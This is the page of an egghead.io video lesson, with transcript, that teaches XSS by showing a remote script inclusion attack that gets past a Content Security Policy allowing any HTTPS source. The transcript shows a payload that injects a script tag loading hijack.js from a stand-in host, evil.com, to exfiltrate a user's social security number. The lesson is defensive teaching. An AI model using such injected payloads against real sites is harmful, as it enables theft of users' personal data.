Read Document Content from a Vulnerable Website via Script Tag Injection in an XSS Payload

Mike Sherov
InstructorMike Sherov
Share this video with your friends

Social Share Links

Send Tweet
Published 4 years ago
Updated 3 years ago

In this lesson, you will learn how to exploit an XSS vulnerability to read the contents of the page body from a vulnerable site, this time by loading up a script from their attacking domain instead of inlining the javascript, using an attack known as Remote Script Tag Injection. This attack will succeed because in the previous lesson, we only blocked inline scripts from executing. We'll solve this problem in our next lesson!

Instructor: [00:00] Now that we mitigated XSS via inline script injection, let's put our attacker hat back on. If we inspect the content security policy of the site, we see that it allows scripts from self and from HTTPS.

[00:12] We could take our malicious payload, strip the script tags and save this as a new file. Let's call it hijack.js. This file will now be available for download.

[00:33] If we logged back in to our site and we've put into the message box script source = https://evil.com:666/hijack.js and hit submit, we see that hijack.js gets included, which will create the image and cause our hijacked payload to be submitted.

[01:01] You can verify that the server has received the user's social security number again, thereby completing the XSS attack via a technique known as remote script inclusion.

egghead
egghead
~ 2 hours ago

Member comments are a way for members to communicate, interact, and ask questions about a lesson.

The instructor or someone from the community might respond to your question Here are a few basic guidelines to commenting on egghead.io

Be on-Topic

Comments are for discussing a lesson. If you're having a general issue with the website functionality, please contact us at support@egghead.io.

Avoid meta-discussion

  • This was great!
  • This was horrible!
  • I didn't like this because it didn't match my skill level.
  • +1 It will likely be deleted as spam.

Code Problems?

Should be accompanied by code! Codesandbox or Stackblitz provide a way to share code and discuss it in context

Details and Context

Vague question? Vague answer. Any details and context you can provide will lure more interesting answers!

Markdown supported.
Become a member to join the discussionEnroll Today